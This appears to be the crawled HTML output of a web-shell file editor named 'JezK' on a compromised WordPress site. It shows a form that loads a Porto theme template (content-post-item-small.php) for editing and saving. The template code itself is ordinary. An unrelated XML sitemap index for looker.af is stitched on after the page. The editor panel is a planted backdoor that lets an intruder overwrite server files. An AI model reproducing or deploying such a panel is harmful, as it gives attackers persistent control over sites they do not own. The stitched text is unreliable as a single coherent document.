
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: content-post-item-small.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
global $porto_settings;

$featured_images = porto_get_featured_images();
$show_date       = isset( $porto_settings[&#039;post-metas&#039;] ) &amp;&amp; in_array( &#039;date&#039;, $porto_settings[&#039;post-metas&#039;] );
$tag             = isset( $title_tag ) ? $title_tag : &#039;h5&#039;;
?&gt;
&lt;div class=&quot;&lt;?php echo isset( $post_item_class ) ? esc_attr( $post_item_class ) : &#039;post-item-small&#039;; ?&gt;&quot;&gt;
	&lt;?php
	if ( count( $featured_images ) ) :
		$attachment_id    = $featured_images[0][&#039;attachment_id&#039;];
		$attachment_thumb = porto_get_attachment( $attachment_id, isset( $image_size ) ? $image_size : &#039;widget-thumb-medium&#039; );
		if ( $attachment_thumb ) :
			?&gt;
		&lt;div class=&quot;post-image img-thumbnail&quot;&gt;
			&lt;a href=&quot;&lt;?php the_permalink(); ?&gt;&quot; aria-label=&quot;post&quot;&gt;
				&lt;img width=&quot;&lt;?php echo esc_attr( $attachment_thumb[&#039;width&#039;] ); ?&gt;&quot; height=&quot;&lt;?php echo esc_attr( $attachment_thumb[&#039;height&#039;] ); ?&gt;&quot; src=&quot;&lt;?php echo esc_url( $attachment_thumb[&#039;src&#039;] ); ?&gt;&quot; alt=&quot;&lt;?php echo esc_attr( $attachment_thumb[&#039;alt&#039;] ); ?&gt;&quot; /&gt;
			&lt;/a&gt;
		&lt;/div&gt;
		&lt;?php endif; ?&gt;
	&lt;?php endif; ?&gt;
	&lt;div class=&quot;post-item-content&quot;&gt;
		&lt;?php if ( ! isset( $show_cats ) &amp;&amp; $show_date &amp;&amp; isset( $meta_first ) ) : ?&gt;
			&lt;span class=&quot;post-date&quot;&gt;&lt;?php echo get_the_date(); ?&gt;&lt;/span&gt;
		&lt;?php endif; ?&gt;
		&lt;?php
		if ( isset( $show_cats ) ) {
			echo &#039;&lt;span class=&quot;meta-cats&quot;&gt;&#039; . get_the_category_list( &#039; &#039; ) . &#039;&lt;/span&gt;&#039;;
		}
		?&gt;
		&lt;&lt;?php echo esc_html( $tag ); ?&gt; class=&quot;post-item-title&quot;&gt;&lt;a href=&quot;&lt;?php the_permalink(); ?&gt;&quot;&gt;&lt;?php the_title(); ?&gt;&lt;/a&gt;&lt;/&lt;?php echo esc_html( $tag ); ?&gt;&gt;
		&lt;?php if ( ! isset( $show_cats ) &amp;&amp; $show_date &amp;&amp; ! isset( $meta_first ) ) : ?&gt;
			&lt;span class=&quot;post-date&quot;&gt;&lt;?php echo get_the_date(); ?&gt;&lt;/span&gt;
		&lt;?php endif; ?&gt;
	&lt;/div&gt;
&lt;/div&gt;
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
